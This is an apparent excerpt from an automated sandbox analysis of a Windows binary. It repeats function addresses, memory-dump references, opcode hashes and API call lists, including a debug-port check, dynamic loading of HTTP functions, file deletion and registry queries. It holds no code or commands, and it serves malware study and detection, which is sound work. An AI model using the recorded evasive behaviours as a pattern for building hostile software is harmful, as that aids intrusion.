                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: BinaryCryptString
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 80407269-0
                                                                                                                                                                                                                          • Opcode ID: 0418850739d7626781930600f170e8330271ee7d840b16371d054fb9262e1749
                                                                                                                                                                                                                          • Instruction ID: 62de5bec956a169481a5778194fdf1df57051168b430666ee5781268b5f467f0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0418850739d7626781930600f170e8330271ee7d840b16371d054fb9262e1749
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60F0B475108605BFD3009F26DC85DAB73ADEB88784B110029F9468B391EBB4BC008B65
                                                                                                                                                                                                                          Function 00401625 Relevance: 1.5, APIs: 1, Instructions: 26nativeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • NtQueryInformationProcess.NTDLL(00000000,00000007,?,00000004,00000000), ref: 0040164E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InformationProcessQuery
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1778838933-0
                                                                                                                                                                                                                          • Opcode ID: 4a1399a23bb0bc12ba5ae64482b34f2c384e135c51c1a14a61ae8bc5af504664
                                                                                                                                                                                                                          • Instruction ID: 5146c5ff74eb99c3e513b584e61ba0d8331e3ddd70afdd09c52295fb5902dc9f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a1399a23bb0bc12ba5ae64482b34f2c384e135c51c1a14a61ae8bc5af504664
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5E09AB1752321AFE320CF69CC85F233BAEEB89A20B008060BA00C7351D574EC0086A4
                                                                                                                                                                                                                          Function 004016BB Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f5a5136bbc70b4a0018e084418bfce5d061723767273416e2e0291bd3ea70187
                                                                                                                                                                                                                          • Instruction ID: 089dadb44dc18b0797678ef5ba442c8809652ba94fb7cfa67b65c038052ec9a1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5a5136bbc70b4a0018e084418bfce5d061723767273416e2e0291bd3ea70187
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DE012362163549FC614CF18D8D4E16B3A9EF8AA54B1B446CD50257742D620ED10CB64
                                                                                                                                                                                                                          Function 0040168C Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                          • Instruction ID: a1635671767398927da0aa1816190fc69100bda25571e9e45a237a418de66b7e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85C012B1445208EFD708CB84E512B56B7FCE704720F14406DE40D47740D63A6B00C655
                                                                                                                                                                                                                          Function 004016AA Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                          • Instruction ID: b23bb995dfb30c632528fdc81509a2daafe07b1b64e7ca450f6c4b88134f84f9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51A00236161E83C6D7535614876630971A6AB41AD4F054A64584184A40DB6DC678E501
                                                                                                                                                                                                                          Function 0041E1DB Relevance: 12.1, APIs: 8, Instructions: 122memorystringfileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,00000000,000F423F), ref: 0041E204
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000), ref: 0041E224
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0067CC4C), ref: 0041E254
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 0041E26F
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(0067CCAB,0067CCAB), ref: 0041E29F
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?), ref: 0041E301
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?), ref: 0041E320
                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 0041E33C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Heap$Free$AllocDeleteFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1985952241-0
                                                                                                                                                                                                                          • Opcode ID: 742f469a22a5af341631ed651aab7db57a0a93ccf1e1eb72d22d5aadee9c9044
                                                                                                                                                                                                                          • Instruction ID: 24bc4b787eba163100fbfc58756f5204999f887e60b27380e355edf6f9f48f95
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 742f469a22a5af341631ed651aab7db57a0a93ccf1e1eb72d22d5aadee9c9044
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91410579601204AFC704DF68EDD596AB7B8FF986007080065ED05E7371EAB4FE12DB6A
                                                                                                                                                                                                                          Function 0043695C Relevance: 10.4, APIs: 8, Instructions: 393stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436C91
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436CF2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3722407311-0
                                                                                                                                                                                                                          • Opcode ID: 3bf3ba5641bcf99497e469fec77b724b2c10feb8ef39c834a77696430b12b83d
                                                                                                                                                                                                                          • Instruction ID: 67b5a4a5b04daad7a95f60bd5bee8071c83f245bd0fc84978605f90964d48742
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bf3ba5641bcf99497e469fec77b724b2c10feb8ef39c834a77696430b12b83d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FF14BB5A02204DFD208DF2CEDD8E29B7E5FB89304705456CED1597361EEB4E8528B2A
                                                                                                                                                                                                                          Function 00436BB6 Relevance: 10.3, APIs: 8, Instructions: 320stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436C91
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436CF2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3722407311-0
                                                                                                                                                                                                                          • Opcode ID: 93f08abacc95682a9c454f0aeec93fbafce23c33d6c2ac6c23b768737a7c3e7a
                                                                                                                                                                                                                          • Instruction ID: 2d8285d9dab4c637f8c7953bcd4f462bcb5e2ae0e6670f6db3990a7f1b9a1ef9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93f08abacc95682a9c454f0aeec93fbafce23c33d6c2ac6c23b768737a7c3e7a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EAC14D75B02208DFD208DF2CEDC8E2977E5FB893047040568ED55D7361EEB4E8568B2A
                                                                                                                                                                                                                          Function 0041F87A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$memset
                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                          • API String ID: 2788080104-4000257214
                                                                                                                                                                                                                          • Opcode ID: 6fe66ccf17b5f2372aacb9bc4733db90d8f29e2b90b15169104d88f3493ba66a
                                                                                                                                                                                                                          • Instruction ID: 371a5831eea4a37533a13f2d53e422aecd75df1e672aac2beebf4d7c28b1b7a3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6fe66ccf17b5f2372aacb9bc4733db90d8f29e2b90b15169104d88f3493ba66a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41316B76A002049FCB14DF68DC91BA977F4FB89704F04447AE909D7320EBB0AE44CB96
                                                                                                                                                                                                                          Function 0041F999 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$memset
                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                          • API String ID: 2788080104-4000257214
                                                                                                                                                                                                                          • Opcode ID: bc3a03154b3e2295211f1e0eed9f91dac7bf6ae7ceb0bffc97bae97d78ff6656
                                                                                                                                                                                                                          • Instruction ID: 114670f2cd88bf99f37d533532433d574fa85a0011b7eefcf1e9e4fcfdc3aaaf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc3a03154b3e2295211f1e0eed9f91dac7bf6ae7ceb0bffc97bae97d78ff6656
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62317CB5A002049FDB14DF68DC91B9977F9EF89704F0845AAED06D7320E7B0AE44CB86
                                                                                                                                                                                                                          Function 00442AFA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 111libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(6F5C0000,HttpQueryInfoA), ref: 00442CA8
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(6F5C0000,InternetSetOptionA), ref: 00442CF1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                                                                          • String ID: HttpQueryInfoA$InternetSetOptionA
                                                                                                                                                                                                                          • API String ID: 190572456-1775429166
                                                                                                                                                                                                                          • Opcode ID: fabe7de7e6f85eda5daa03ada1acf9803514b4439227e1eaed320f7146cb866f
                                                                                                                                                                                                                          • Instruction ID: 99a9e5799e649aa26cca8c53ff1b95307459894a29596d3904e707583eccb788
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fabe7de7e6f85eda5daa03ada1acf9803514b4439227e1eaed320f7146cb866f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A516EB9681141AFCB86DF54EC99811BBBABB4C35431600ADE9758B370F7F1AC08DB19
                                                                                                                                                                                                                          Function 00431366 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,0067D0F7,?,?,?,?), ref: 004313AA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
